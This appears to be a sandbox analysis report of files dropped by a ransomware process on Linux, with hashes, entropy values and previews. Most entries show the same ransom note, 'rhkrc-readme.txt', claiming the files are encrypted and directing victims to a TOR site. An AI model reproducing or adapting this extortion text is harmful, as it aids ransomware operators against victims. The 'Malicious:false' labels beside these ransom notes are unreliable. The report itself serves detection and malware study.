                  SHA-512:97F01EE23008297EF009DBC69070F2A24B8AD8A226921081E90E9FE0E83E6A6C9984E8DE14604CCA103E6C28075049AD9D301A74FE1F7A55B698353CEC0F435C
                  Malicious:false
                  Reputation:low
                  Preview: ......o..ER..0...M..>X..S...z.?...D.....x........9..Z....ik...X...{.....p{3.E.......}`s'h...c...z.....O..oh.s....6._....e*kN....`..|.H............+"R.U....K.+.9[....;S..b@.+...m....*d6.9..V..K.Dx.....J_#...K.!d...xP.V.X...H..\?...A..D.yjj....w.....1.\..2.!y:/..A.`H......}.....!.....kh..[.O.1..#&vN...sl...TMr...d1...#[<V....t.o.*-...).hL6...g.o._.w6...xS......g............_.C...H..0.:C..?.bi.X..XH..c..u.....y..@O.T.a.^I.\8..y.J../X.N=.xD................p..t.M...'.......&....M......$(.5..#O..F...^:........h1.~BW..9.c.....\......r.L.f.?..VciE..Z....../..'.0........)Ck|.a.. .D\^W...F,........^.G..."\3.y..x).........,K..\v....V..."...T8.L....^..R.0d..M...u.{.....n.].+70!.$f.(......v...*..6....Nw...%..Z..6h.....^....^.u.T{.'.....*.......k).............>..\...4.....+:m1.ON3...i.l..Tu@..Ij...p./..m....t ...e...R~.T^..[.Q...x`_0..sR.W.b].yctA.S....Y.mQ..&R..0.......t.c.7.....^0E...5....f.xd.p..Io..L.k..O..6<...'..k2...j...5......*Ub..^[.... ...cD..........).5j3k$..-...k.....-%.'"..P.._. ag..-..
                  /home/user/.config/libreoffice/4/user/config/javasettings_Linux_X86_64.xml
                  Process:./wQN5w2558L
                  File Type:COM executable for DOS
                  Category:dropped
                  Size (bytes):2037
                  Entropy (8bit):7.781176884985161
                  Encrypted:false
                  SSDEEP:48:2RsgAVk8mOWrJ3lDyFRgtJZ0pmzltoQITwD5IY/On:2RsgAVkdOwhJHB2DUD2YG
                  MD5:2B2BCDAF0973098FA1B4057FD498FE34
                  SHA1:1350E0D383DC5E352B25D5A211AE2EDF4559AF07
                  SHA-256:F36BA1037326A32F75D5486E6F44FE92649745BE9B8BFC8CD462F2D5C91DC5E6
                  SHA-512:B3CE50AFD94CE9C6D5E86AAA45DE1334851FC3F5C19847312D46980767956B009016C5F005EF18B685F362BE61A83BE48E7A31B924263A86D6683F2D3CF1ADE6
                  Malicious:false
                  Reputation:low
                  Preview: .B$~....(...l^.(.|...&.'.Y.x.I.G.....{..D.c6..Eq...Z.E.S.....8!Y...........@...eC%.F..3...O.{..QeGa..6....G.M%....C0....aYP,.!... .o...n.q.....8O..;.....2$8m.........s..m'}x......#.W..].+.0n...s.'.}O.L.....p+[...QQX.....}....5.#.L.X.x..|.........T...A.....>L .v...''.[.a....H.v..).W..F....m..\(.BA.....S....$E..eL.c..h..F9..]%[.Z...R..m.......'.........pJ.[.=.M..*0...7.::...?.E........%'O*....\..L.".... ".......t...O3\.b...hbh.$.........n..h.3...Gb.........;....!..{@..HA.@.......~*'H......F......k..o.B..s.V..?=OR3............c_......}...Z.@..Z.....\..W.O...v.......x...G........D...f......2...B..t.ZcjH...[...A|..j<.g.($............{......#u)J....S.N..._.2V.w.X.v..N.....-...Lh.N..+..&.w..m...#.p.Vt........OG.7...P9..E..U..S..O..._..Af..F0....eE...m.F.#2.}.Yl#...r.......)d./......s...&.....g...{.F.Y...L...2X.&...l;.M..."........]......~...5.K.....,F.}..w...i...j.'<.s.Q....*J...k.T..N;..].I+.....#.0.[.(...8+.......uy..]1d...".......4.....A|..4.xY=...VR.|]...N;".]+..a...G.T..5,.V.....`.v.4..E
                  /home/user/.config/libreoffice/4/user/config/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/scalc/images/Bitmaps/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/scalc/images/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/scalc/menubar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/scalc/popupmenu/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/scalc/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/scalc/statusbar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/scalc/toolbar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/simpress/images/Bitmaps/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/simpress/images/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/simpress/menubar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/simpress/popupmenu/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/simpress/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/simpress/statusbar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/simpress/toolbar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/swriter/images/Bitmaps/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
